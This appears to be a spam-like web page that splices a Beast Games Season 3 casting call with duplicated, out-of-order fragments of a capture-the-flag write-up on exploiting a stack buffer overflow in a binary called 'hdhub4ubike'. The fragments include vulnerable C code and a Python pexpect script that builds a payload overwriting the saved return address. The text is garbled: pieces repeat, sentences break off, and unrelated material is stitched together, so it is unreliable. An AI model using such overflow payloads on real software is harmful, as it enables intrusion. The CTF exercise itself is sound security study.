Beast Games Season 3

int main(void) char buf[64]; puts("=== Welcome to the HD Bike Hub ==="); printf("Enter your hub key: ");

return 1;

p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal

Therefore we want our to be 0x004011a6 . 3.2 Crafting the payload The stack layout (simplified) at the moment of the overflow:

def main(): p = pexpect.spawn(BIN, encoding='utf-8') p.expect("Enter your hub key:") # build payload payload = b'A' * 64 # fill buffer payload += b'B' * 8 # overwrite saved RBP payload += struct.pack("<Q", TARGET_ADDR) # overwrite RIP

Challenge name: hdhub4ubike CTF: 2023 – BicycleCTF (the “Bike‑Hub” event) Category: Pwn / Binary Exploitation Points: 400 (medium) Author: unknown 1️⃣ Challenge Overview The provided artifact is a 64‑bit ELF executable named hdhub4ubike . When executed it prints a short banner and then prompts the user for a “bike‑hub key”. If the key is correct, the program prints the flag; otherwise it terminates with “Invalid key!” .

if (check_key(buf) == 0) puts("Invalid key!"); exit(1);

YOUR COUNTRY.
YOUR MOMENT.
We're looking for world-class competitors from around the globe: Champions, influencers, record holders, Olympians, national heroes, viral sensations, unique special talents (chess champions, spelling-bee champions, etc), award winners, once-in-a-generation talents or individuals who embody the spirit of their country, who can stand on a global stage and proudly carry their country's name.
Why are you deserving of a spot to compete in BEAST GAMES Season 3? Show us your energy, passion, and national pride.
IMPORTANT: If you have already submitted, DO NOT submit again (e.g. don't send another video or resubmit the application).

Hdhub4ubike -

int main(void) char buf[64]; puts("=== Welcome to the HD Bike Hub ==="); printf("Enter your hub key: ");

return 1;

p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal hdhub4ubike

Therefore we want our to be 0x004011a6 . 3.2 Crafting the payload The stack layout (simplified) at the moment of the overflow: int main(void) char buf[64]; puts("=== Welcome to the

def main(): p = pexpect.spawn(BIN, encoding='utf-8') p.expect("Enter your hub key:") # build payload payload = b'A' * 64 # fill buffer payload += b'B' * 8 # overwrite saved RBP payload += struct.pack("<Q", TARGET_ADDR) # overwrite RIP If the key is correct, the program prints

Challenge name: hdhub4ubike CTF: 2023 – BicycleCTF (the “Bike‑Hub” event) Category: Pwn / Binary Exploitation Points: 400 (medium) Author: unknown 1️⃣ Challenge Overview The provided artifact is a 64‑bit ELF executable named hdhub4ubike . When executed it prints a short banner and then prompts the user for a “bike‑hub key”. If the key is correct, the program prints the flag; otherwise it terminates with “Invalid key!” .

if (check_key(buf) == 0) puts("Invalid key!"); exit(1);

CLICK HERE TO BEGIN
Please reach out to [email protected] with any questions or technical issues.
It may take us 72 hours to get back to you.